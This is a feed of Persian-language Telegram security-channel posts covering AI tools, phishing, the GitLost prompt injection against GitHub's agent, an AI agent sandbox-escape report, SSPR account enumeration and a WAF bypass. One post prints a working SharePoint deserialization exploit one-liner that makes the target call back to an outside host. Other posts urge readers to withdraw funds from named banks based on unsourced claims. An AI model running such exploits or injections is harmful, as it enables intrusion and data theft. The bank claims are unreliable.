بعد از کار با این سبک مدل ها:
بنظرم روی پرامپت نویسی یه ریسرچ خوب داشته باشید.
چرا؟
چون مهندسی پرامپت داستان عمیقی داره بخصوص توی حوزه امنیت
شما دقیق باید مدل رو راهنمایی کنید تا بهترین ریزالت رو بده بهتون
مثلا نحوه استفاده ماژولار از پرامپت ها
استفاده بهینه و تو در تو
یا تعریف ساب ایجنت ها
منظور نهایی: برای پیاده سازی چیز دقیقی که تویه ذهنتون هست باید زبان دقیق مدل هارو بلد باشید
4 · 512 · CyberSecurity
Фотография
нажмите — покажем
нажмите — покажем
✔️ چین با ZCode وارد رقابت جدی در ابزارهای هوش مصنوعی برنامهنویسی شد
شرکت Z.ai از محیط توسعه هوشمند ZCode رونمایی کرد؛ یک IDE ایجنتمحور که با مدل متنباز GLM-5.2 یکپارچه شده و رقیبی برای ابزارهایی مانند Cursor، Claude Code و GitHub Copilot محسوب میشود.
محیط ZCode برای ویندوز، macOS و لینوکس منتشر شده و امکاناتی مانند برنامهریزی، کدنویسی، تست، بازبینی کد و اجرای وظایف چندمرحلهای را در اختیار توسعهدهندگان قرار میدهد.
یکی از قابلیتهای جالب این ابزار، کنترل Agent از طریق تلگرام، ویچت و Feishu است؛ بهطوریکه میتوان حتی از طریق موبایل روند اجرای پروژه را مشاهده و دستورات جدید ارسال کرد.
نکته قابلتوجه اینکه Z.ai تلاش کرده وابستگی خود را به زیرساختهای غربی کاهش دهد. مدل GLM-5.2 از سختافزارهای داخلی چین از جمله Huawei Ascend پشتیبانی میکند و همزمان با افزایش محدودیتهای آمریکا علیه برخی مدلهای هوش مصنوعی، به یکی از جدیترین گزینههای متنباز برای برنامهنویسی تبدیل شده است.
@kaliboys | کالی بویز
3 · 553 · CyberSecurity
Фотография
нажмите — покажем
нажмите — покажем
✈️موج جدید «فیشینگ شبح» سامانههای امنیت ایمیل را دور میزند
🎥پژوهشگران امنیت سایبری از شناسایی موج جدیدی از حملات موسوم به Ghost Phishing خبر دادهاند که با استفاده از کیت EvilTokens، سازمانها و شرکتها در آمریکا و اروپا را هدف قرار داده است. در این روش، محتوای صفحه فیشینگ بهصورت رمزگذاریشده ارسال شده و تنها پس از باز شدن در مرورگر قربانی رمزگشایی میشود؛ موضوعی که باعث میشود بسیاری از سامانههای سنتی امنیت ایمیل و بررسی لینکها قادر به شناسایی آن نباشند.
🎤این حملات با سوءاستفاده از قابلیت Microsoft Device Code، کاربران را به ورود قانونی به حساب Microsoft 365 ترغیب کرده و بدون سرقت مستقیم رمز عبور، امکان دسترسی مهاجمان به ایمیلها، فایلها و سرویسهای ابری را فراهم میکنند. کارشناسان هشدار دادهاند که برای مقابله با این تهدید، سازمانها باید علاوه بر بررسی لینکها، از ابزارهای تحلیل رفتار مرورگر و محیطهای ایزوله (Sandbox) برای شناسایی صفحات فیشینگ پیشرفته استفاده کنند.
✈️@HackerNewsCyber
480 · Фотография
нажмите — покажем
нажмите — покажем
نشت مخفیانهی دیتا از ریپازیتوریهای پرایوت گیتهاب با یه ترفند سادهی هوش مصنوعی 📚
فکر کنید یه نفر بدون هیچ پسورد و دسترسیای، بتونه کدهای مخفیانهتون رو توی گیتهاب بخونه. چطوری؟ با گول زدن ایجنت هوش مصنوعیِ خود گیتهاب!
تیم Noma Labs یه آسیبپذیری خیلی خطرناک (به اسم GitLost) توی سیستم جدید Agentic Workflows گیتهاب پیدا کرده. داستان از این قراره که این ایجنتها میتونن issueها رو بخونن و اتوماسیون انجام بدن.
حالا هکرها چیکار میتونن بکنن؟
هکر کافیه بیاد تو یکی از ریپازیتوریهای پابلیک شما یه Issue باز کنه و توش یه سری دستور مخفیانه به زبان انگلیسی (Prompt Injection) قایم کنه.
ایجنت گیتهاب این متن رو میخونه، گول میخوره و به جای کار اصلیش، میره فایلها و دیتای ریپازیتوریهای پرایوتِ همون سازمان رو میخونه و برای هکر میفرسته!
نکتهی جالب اینجاست:
گیتهاب کلی گاردریل امنیتی چیده بود که دقیقاً جلوی همین اتفاق رو بگیره. اما محققها فهمیدن فقط با اضافه کردن کلمهی "Additionally" (بهعلاوه/همچنین) توی پرامپت هک، مدل هوش مصنوعی کلا گیج میشه و به جای اینکه درخواست رو رد کنه، تمام محدودیتها رو دور میزنه و دیتا رو لو میده.
این دقیقاً نشون میده که توی سیستمهای جدید هوش مصنوعی، همون متنی که ایجنت میخونه همزمان میتونه پاشنه آشیل و نقطه حمله باشه. حملات Prompt Injection الان دقیقاً دارن همون بلایی رو سر AI میارن که قبلاً SQL Injection سر وبسایتها میاورد.
البته این باگ به طور مسئولانه به گیتهاب گزارش شده، ولی حواستون به ایجنتهایی که به سورسکدهاتون دسترسی دارن باشه!
🔗 https://noma.security/blog/gitlost-how-we-tricked-githubs-ai-agent-into-leaking-private-repos
✅ Channel
💬 Group
4 · 520 · CyberSecurity
این کد poc مربوط به rce جدید sharepoint که deserial هست
$n=[Guid]::NewGuid().ToString('N');$cb="http://remote/spse-cookie-rce-$n";$tmp="$env:TEMP\$n.bin";$cmd="powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing '$cb'";& 'ysoserial.exe' -g TypeConfuseDelegate -f BinaryFormatter -o raw -c $cmd --outputpath $tmp|Out-Null;Add-Type -AssemblyName System.IdentityModel;$raw=[IO.File]::ReadAllBytes($tmp);$cookie=[Convert]::ToBase64String(([System.IdentityModel.DeflateCookieTransform]::new()).Encode($raw));$token="<sc:SecurityContextToken xmlns:sc='http://schemas.xmlsoap.org/ws/2005/02/sc'><sc:Identifier>urn:unique-id:securitycontext:$n</sc:Identifier><Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>$cookie</Cookie></sc:SecurityContextToken>";$rstr="<t:RequestSecurityTokenResponse xmlns:t='http://schemas.xmlsoap.org/ws/2005/02/trust'><t:RequestedSecurityToken>$token</t:RequestedSecurityToken></t:RequestSecurityTokenResponse>";Write-Host "Callback: $cb";try{Invoke-WebRequest 'http://TARGET/_trust/default.aspx' -Method Post -Proxy 'http://127.0.0.1:8080' -ContentType 'application/x-www-form-urlencoded' -Body @{wa='wsignin1.0';wctx='http://TARGET/';wresult=$rstr} -UseBasicParsing -TimeoutSec 60}finally{Remove-Item $tmp -Force -ErrorAction SilentlyContinue}
https://x.com/testanull/status/2079082982640668990
10 · 460 · CyberSecurity
Фотография
нажмите — покажем
нажмите — покажем
Фотография
нажмите — покажем
нажмите — покажем
Фотография
нажмите — покажем
нажмите — покажем
Фотография
нажмите — покажем
нажмите — покажем
وزارت دادگستری امریکا با همکاری FBI و اداره ملی تحقیقات فنلاند، Peter Stokes، یکی از هکرهای گروه هکری بزرگ Scattered Spider رو با همکاری مایکروسافت دستگیر کردن!
گروه Scattered Spider یکی از گروه های هکری معروفی هست که طی سالهای اخیر به شرکتهای MGM، ردیت، DoorDash، Riot Games، MailChimp و غیره نفوذ کرده و از اونها بیش از 100 میلیون دلار باج گرفته!
یکی از هکهای اخیر اونها هک شرکت جواهرسازی Tiffany بود که از اونها 8 میلیون دلار باج خواستن ولی این شرکت باج رو نداد اما کماکان به خاطر اسیب های عملیاتی که بهش وارد شد 2 میلیون دلار از این هک ضرر کرد.
نکته عجیب در مورد بازداشت Peter Stokes که در حال حاضر 19 سالشه، همکاری عجیب مایکروسافت با FBI بوده که زنگ خطر بزرگی رو برای حریم شخصی کاربران ویندوزی به صدا دراورده.
طبق اسناد دادگاه، FBI از طریق Global Device ID یا GDID لپتاپ این هکر، موفق شده ردپای این هکر رو در سرویسهای مختلف بهم وصل کنه و حتی استفاده از پروکسی و VPN هم تاثیری در مخفی کردن این هکر نداشته.
شناسه GDID شناسه ای در دستگاه های ویندوزی هست که فقط با تعویض ویندوز یا تغییر سخت افزاری بزرگ (مثل تعویض مادربورد) تغییر میکنه و مثلا مایکروسافت برای فعالسازی ویندوز از اون استفاده میکنه.
ولی طبق اسناد منتشر شده از دادگاه این هکر، مایکروسافت داده هایی داشته که میدونسته GDID دستگاه این هکر در چه زمانهایی، از چه سایتهایی بازدید کرده و با چه IPهایی متصل میشده.
از جمله نمونه اونها این هست که مایکروسافت به FBI اطلاعاتی ارائه داده که نشون میده اکانتی با شناسه خاصی از نرم افزار ngrok برای تونل کردن کامپیوتر خودش به کامپیوتر یکی از شرکتهای قربانی استفاده کرده، این GDID در زمان خاصی با IP خاصی در تایلند بوده که این هکر با اون IP در اسنپ چت عکسهای خاصی منتشر کرده. یا مثلا این GDID در زمان خاصی با ایپی استونی (که ظاهرا خونه اش بوده) بازی Growtopia رو بازی کرده.
در مثال دیگری این GDID وارد سایت Empire Hotel شده، که با تطبیق اون با زمان عکسهایی که این هکر در اسنپ چتش از این هتل منتشر کرده و همچنین در اون زمان با ایپی خاصی به اکانت اپلش دسترسی داشته، FBI با دقت بالایی موفق شده بفهمه که این شخص همون هکر Scattered Spider بوده.
چنین سطح گسترده از اطلاعاتی که ویندوز به سرورهای م
18 · 699 · CyberSecurity
یک عامل هوش مصنوعی از کنترل خارج شد
🔹اوپنایآی اعلام کرد که در یک آزمایش امنیتی، یک عامل خودمختار مبتنی بر مدلهای پیشرفته این شرکت از محیط کنترلشده خارج شده و به اینترنت دسترسی پیدا کرده است. این عامل برای انجام مأموریت تعریفشده، زیرساختهایهاگینگفیس را هدف یک حمله سایبری قرار داد. این رخداد بار دیگر نگرانیها درباره مخاطرات امنیتی هوش مصنوعی پیشرفته را افزایش داده است.
@ITSecurityComputer
2 · 566 · CyberSecurity
Ссылка
нажмите — покажем
нажмите — покажем
یه تارگت بود داشتم تست میکردم و نیاز به بایپس waf داشت و این یکی akamai بود
اگر خواستید برای xss بایپس کنید همچین وف هایی رو باید دنبال راههای alternative باشید
تو این نوشن یه روش استفاده از dom clobbering رو براتون گفتم و یک اسکریپت هم توش هست برای پیدا کردن alternative برای کلمه window و document
داشته باشید به درد میخوره
https://cherry-event-b75.notion.site/DOM-Clobbering-WAF-Bypass-3af4f6d7dcce80fe919dcc27223a249e?source=copy_link
15 · 581 · CyberSecurity
⚠️ هشدار مهم لطفاً اطلاعرسانی کنید!!
بر اساس گزارشهای متعددی که به دست ما رسیده، شماری از کاربران پلتفرم «میلیگلد» اعلام کردهاند که در روند فروش، تسویه یا برداشت دارایی خود با مشکلاتی مواجه شدهاند. همچنین گزارشهایی درباره اختلاف قابلتوجه قیمتهای اعلامی این پلتفرم با قیمتهای رایج بازار دریافت شده است.
موضوع زمانی جدیتر میشود که با وجود این گزارشها و نگرانیهای ایجادشده، تاکنون شفافسازی کافی و روشنی درباره وضعیت موجود، نحوه تأمین طلا و فرآیند تسویه دارایی کاربران ارائه نشده است.
اگر در این پلتفرم سرمایه دارید، توصیه میکنیم وضعیت دارایی، امکان برداشت و شرایط تسویه حساب خود را فوراً و با دقت بررسی کنید و تا زمان روشنشدن کامل موضوع، با احتیاط بیشتری تصمیمگیری کنید.
ما هیچ پلتفرم، مجموعه یا روش سرمایهگذاری جایگزینی را پیشنهاد یا تأیید نمیکنیم.
از مسئولان «میلیگلد» نیز انتظار میرود در سریعترین زمان ممکن، بهصورت شفاف و مستند درباره گزارشهای منتشرشده، وضعیت دارایی کاربران، نحوه تأمین پشتوانه طلا و فرآیند تسویه توضیح دهند.
با توجه به تعداد بالای کاربران این پلتفرم، در صورت تأیید وجود مشکل جدی در تأمین یا تسویه داراییها، تبعات مالی آن میتواند بسیار گسترده باشد.
لطفاً این هشدار را منتشر کنید
8 · 569 · CyberSecurity
ه ثانیه دیر جنبیده بودم، جای نوشتن این پست داشتیم یه فاجعه امنیتی ناشی از AI رو جمع میکردیم.
چند وقت پیش داشتم کدی رو که AI نوشته بود، قبل از دپلوی review میکردم. توی importها یه پکیج به چشمم خورد که یهجوری بود.
همه چی تقریبا منطقی به نظر میرسید. اسمش دقیقا همون الگوی سایر پکیجها رو داشت اما تا حالا جایی ندیده بودمش.
به تیم گفتم دست نگه دارن، کار روی پروداکشن نره. برگشتم روی استیج تا از ریشه بررسیش کنم.
مدل AI فقط از روی توهم، یه اسم قانعکننده برای خودش ساخته بود؛ دقیقا مثل وقتی که با همون اطمینان یه فکت یا آمار جعلی تحویل میده. به این پدیده میگن هالوسینیتکردن. AI چیزی رو با اطمینان کامل تولید میکنه که یا نادرسته یا اصلا وجود نداره.
پکیج رو سرچ کردم و موضوع عجیبتر شد. فهمیدم قضیه از یه اسم ساختگی خیلی فراتره...
همون اسم، چند ماه قبل توسط یه ناشناس ثبت شده بود. README و توضیح نداشت. فقط یه پکیج مخرب که منتظر بود من، یا هر کس دیگهای توی یه محیط فینتک بدون بررسی accept بزنه و نصبش کنه.
اگه شک نکرده بودم، الان داشتم با یه پروسهی کاملا متفاوت سر و کله میزدم. کنار تیم امنیت، دنبال این میگشتیم که مهاجم تا کجا نفوذ کرده، چه سرویسهایی رو تحت تاثیر قرار داده و چی از دیتای حساسمون بیرون رفته.
با یه مقدار تحقیق متوجه شدم این یه اتفاق تصادفی نیست. این اسم های ساختی الگو دارن. وقتی AI هالوسینیت میکنه، معمولا اسمهای تکراری میسازه.
و دقیقا همینجا مهاجم وارد میشه. لازم نیست اسم پکیجها رو حدس بزنه. کافیه خروجی مدلهای AI رو زیر نظر بگیره، ببینه کدوم اسم جعلی بیشتر تکرار میشه و همون اسم رو زودتر از همه ثبت کنه. بعدش کافیه داخل اون پکیج، کد خودش رو بنویسه.
دقیقا همون چیزی که من داشتم.
به این حمله میگن Slopsquatting. نسبتا جدیده و از محصولات عصر AIه 😂
تکاملیافتهی typosquatting قدیمیه، فقط این بار بهجای اشتباه تایپی کاربر، از اشتباه هوش مصنوعی سواستفاده میکنن.
یه نمونهی خیلی معروف هم داره. پکیج جعلی به اسم "huggingface-cli" رو یکی ثبت کرد. فقط چون AI مدام اسمش رو پیشنهاد میداد. بیش از 30 هزار بار دانلود شد.
نکتهای که این حمله رو خطرناکتر از یه باگ معمولی میکنه اینه که توی کد ریویو دنبال باگ منطقی میگردیم، نه دنبال اینکه اسم پکیج import شده واقعا وجود داره یا نه. اعتماد به AI، دقی
10 · 307 · CyberSecurity
Фотография
нажмите — покажем
нажмите — покажем
✈ مایکروسافت نقشه تهدیدات برنامههای وب ابری را منتشر کرد
©️ مایکروسافت یک «ماتریس تهدیدات برنامههای وب ابری» منتشر کرده است که با تکیه بر چارچوب میتری اَتک (MITRE ATT&CK)، مسیرهای حمله به برنامههای ابری و سکوهای بدون سرور را از مرحله نفوذ تا دسترسی به منابع متصل دستهبندی میکند.
©️ بر اساس این چارچوب، مهاجم میتواند از آسیبپذیری برنامه، رابطهای مدیریتی در معرض اینترنت، اعتبارنامههای استقرار یا حتی دستکاری مخزن کد و تصویرهای کانتینری برای ورود به محیط ابری استفاده کند. پس از دستیابی به اجرای کد، سرقت اطلاعات محیط اجرا و اعتبارنامهها یا دسترسی به هویت بارکاری میتواند امکان دسترسی به منابع دیگری مانند پایگاههای داده، فضای ذخیرهسازی و سرویسهای هوش مصنوعی را فراهم کند.
©️ مایکروسافت همچنین خطراتی مانند ایجاد کارهای زمانبندیشده برای حفظ ماندگاری، تغییر محیطهای آزمایشی برای دور زدن نظارت و غیرفعالکردن ثبت رویدادهای ابری را برجسته کرده است.
©️ این ماتریس نشان میدهد امنیت برنامههای ابری نباید صرفاً در سطح کد یا زیرساخت بررسی شود؛ زیرا یک نفوذ در برنامه میتواند از طریق هویتها، اتصالدهندهها و منابع متصل، به مسیر گستردهتری در محیط ابری تبدیل شود.
🌐 @HackerNewsCyber
7 · 374 · CyberSecurity
Фотография
нажмите — покажем
нажмите — покажем
✔️ گزارش آنتروپیک از سوءاستفاده گسترده از Claude
آنتروپیک در گزارش امنیتی جدید خود، موارد متعددی از سوءاستفاده گروهها و نهادهای مختلف در سراسر جهان از Claude را منتشر کرده است.
در بخشی از گزارش، چند عملیات مرتبط با ایران شناسایی شده که از هوش مصنوعی برای تولید و بازنویسی محتوا، تحلیل اطلاعات عمومی و فعالیتهای سایبری استفاده کردهاند.
در پروندهای جداگانه، شبکهای منتسب به MEK/NCRI حدود ۸۴۰۰ پست تلگرام یک فعال واقعی را به Claude داده بود تا سبک نوشتاری او را تقلید کرده و با هویتی مشابه با دیگران گفتگو کند.
همچنین یک گروه مستقر در شمال یمن از Claude Code برای توسعه نرمافزار هدایت موشک و راکت استفاده کرده است.
در بخش مربوط به چین نیز آنتروپیک میگوید Alibaba طی حدود دو ماه بیش از ۱۵۱ میلیون تعامل با Claude داشته و Moonshot AI نیز نزدیک به ۳۰۰ هزار درخواست کاربران Kimi را به Claude منتقل کرده است.
آنتروپیک اعلام کرده حسابهای مرتبط با موارد شناساییشده را مسدود کرده است.
@kaliboys | کالی بویز
4 · 551 · CyberSecurity
🔴 تحریمها اینبار به HTTPS بانکهای ایرانی رسیدند!
ماجرا چیه؟ 🤔
گزارشها میگن بعضی از بانکهای ایرانی بهدلیل تحریمهای آمریکا، در تأمین یا تمدید گواهی امنیتی SSL/TLS برای سایتهای بانکی با مشکل مواجه شدهاند و بعضی بانکها مجبور به تغییر دامنه سایت خود شدهاند.
حالا SSL/TLS چیه؟
همون قفلی 🔒 که کنار آدرس سایت میبینید و به مرورگر میگه:
«این سایت واقعاً همون سایتیه که ادعا میکنه و ارتباط شما باهاش رمزگذاری شده.»
نکته مهم اینه که OFAC خودش صادرکننده گواهی SSL نیست؛ اما تحریمها میتونن باعث بشن شرکتهای بینالمللی ارائهدهنده این خدمات، به بانکهای تحریمشده سرویس ندن یا همکاریشون رو محدود کنن.
یعنی تحریم فقط به پول و انتقال بانکی محدود نمیشه؛ حتی بعضی از زیرساختهای فنی مورد استفاده بانکها برای ارائه خدمات اینترنتی هم میتونن تحت تأثیر قرار بگیرن.
📌 گزارش کامل:
Digiato Global — گزارش تغییر دامنه و گواهی SSL بانکهای ایرانی
5 · 486 · CyberSecurity
GIF
IMG_9626.MP4 · 5.3 МБ · нажмите — покажем
IMG_9626.MP4 · 5.3 МБ · нажмите — покажем
یک روز همچیز از اینجا شروع شد…
محل عکس بک گراند Windows XP
بعد 25 سال ببینید تپه چه شکلی شده
3 · 343 · CyberSecurity
Ответ⚠️ هشدار مهم لطفاً اطلاعرسانی کنید!!
بر اساس گزارشهای متعددی که به دست ما رسیده، شماری از کاربران پلتفرم «میلیگلد» اعلام کردهاند که در روند فروش، تسویه یا برداشت دارایی خود با مشکلاتی مواجه شدهاند. همچنین گزارشهایی درباره اختلاف قابلتوجه قیمتهای اعلامی این پلتفرم با قیمتهای رایج بازار دریمیلی گلدی که الان کلی شاکی داره و پول خیلیارو نمیده (به هر دلیلی)
زودتر اعلام شده بود در آستانه زمین خوردنه پول هاتون رو خارج کنید
2 · 247 · فقط این صندوق ها نیستند بانک ها هم هستند
اگر پول در این بانک ها دارید خارج کنید
بانک سرمایه : زیان انباشته حدود ۷۹ هزار میلیارد تومان ! کفایت سرمایه منفی بیش از ۲۵۰ درصد
بانک ایرانزمین : زیان انباشته ده ها هزار میلیارد تومانی و کفایت سرمایه به شدت منفی
بانک دی : کفایت سرمایه منفی
بانک سپه : ناترازی ساختاری و کفایت سرمایه پایین
مؤسسه اعتباری ملل : کفایت سرمایه منفی
2 · 188 · CyberSecurity
Ссылка
нажмите — покажем
нажмите — покажем
یه تحقیق امنیتی جالب از تیم SpiderLabs منتشر شده که نشون میده صفحهٔ «رمز عبورم رو فراموش کردم» مایکروسافت (همون SSPR - Self-Service Password Reset) بدون اینکه لاگین کنی، اطلاعات زیادی دربارهٔ حسابهای سازمانها لو میده.
🕵️ ماجرا چیه؟
وقتی میری تو صفحهٔ passwordreset.microsoftonline.com و ایمیل یه نفر رو میزنی، سرور مایکروسافت رفتار متفاوتی نشون میده بسته به اینکه:
۱️⃣ اون ایمیل اصلاً حساب داره یا نه
اگه حساب وجود نداشته باشه، فوری برمیگردی به صفحهٔ اول. اگه وجود داشته باشه، حتی اگه بازیابی رمز براش فعال نباشه، یه پیام دیگه میبینی. یعنی فقط با امتحان کردن ایمیلها (مثلاً از لینکدین یا سایت شرکت) میشه فهمید کدومها واقعیان — بدون اینکه هیچ رمزی امتحان کنی.
۲️⃣ چه روشهای امنیتیای براش ثبت شده
اگه بازیابی فعال باشه، صفحه نشون میده اون آدم رمزش رو با پیامک بازیابی میکنه، با اپ احرازهویت، یا با یه ایمیل دیگه. این خیلی مهمه چون:
کسی که فقط با «ایمیل جایگزین» محافظت شده = هدف ضعیف
کسی که با اپ احرازهویت (مثل Authenticator) محافظت شده = هدف سختتر
۳️⃣ آیا حساب ادمینه یا نه 🎯
نکتهٔ جالب: مایکروسافت بازیابی رمز رو برای حسابهای ادمین همیشه فعال نگه میداره، حتی اگه کل سازمان این قابلیت رو خاموش کرده باشه. پس اگه یه سازمان SSPR رو برای کاربران عادی بسته باشه ولی یه حساب هنوز جواب بده، تقریباً مطمئنی که اون حساب ادمینه!
⚠️ چرا مهمه؟
یه مهاجم با این تکنیک میتونه بدون هیچ حملهای:
فهرست ایمیلهای حدسی رو تبدیل کنه به لیست حسابهای تأییدشده
بفهمه کدوم حسابها امنیت ضعیف دارن (هدف اول برای فیشینگ)
حسابهای ادمین رو شناسایی کنه
روش دقیق حمله رو متناسب با نوع MFA انتخاب کنه (مثلاً برای SMS بره سراغ سیمسواپ)
جالبه که قبلاً یه کپچا جلوی این صفحه بود ولی از اوت ۲۰۲۶ مایکروسافت حذفش کرد و فقط محدودیت نرخ درخواست گذاشت.
محققها حتی یه ابزار پایتون به اسم ResetSpy ساختن که این کار رو خودکار میکنه و روی گیتهاب هم منتشرشه.
🛡 راهحل برای سازمانها
بازیابی رمز رو فقط برای گروه خاصی فعال کنید، نه همه
روشهای ضعیف (ایمیل جایگزین، سؤال امنیتی) رو حذف کنید و فقط اپ احرازهویت/تلفن بذارید
برای حسابهای ادمین از MFA مقاوم در برابر فیشینگ (مثل کلید امنیتی FIDO2) استفاده کنید
لاگهای En
3 · 125 ·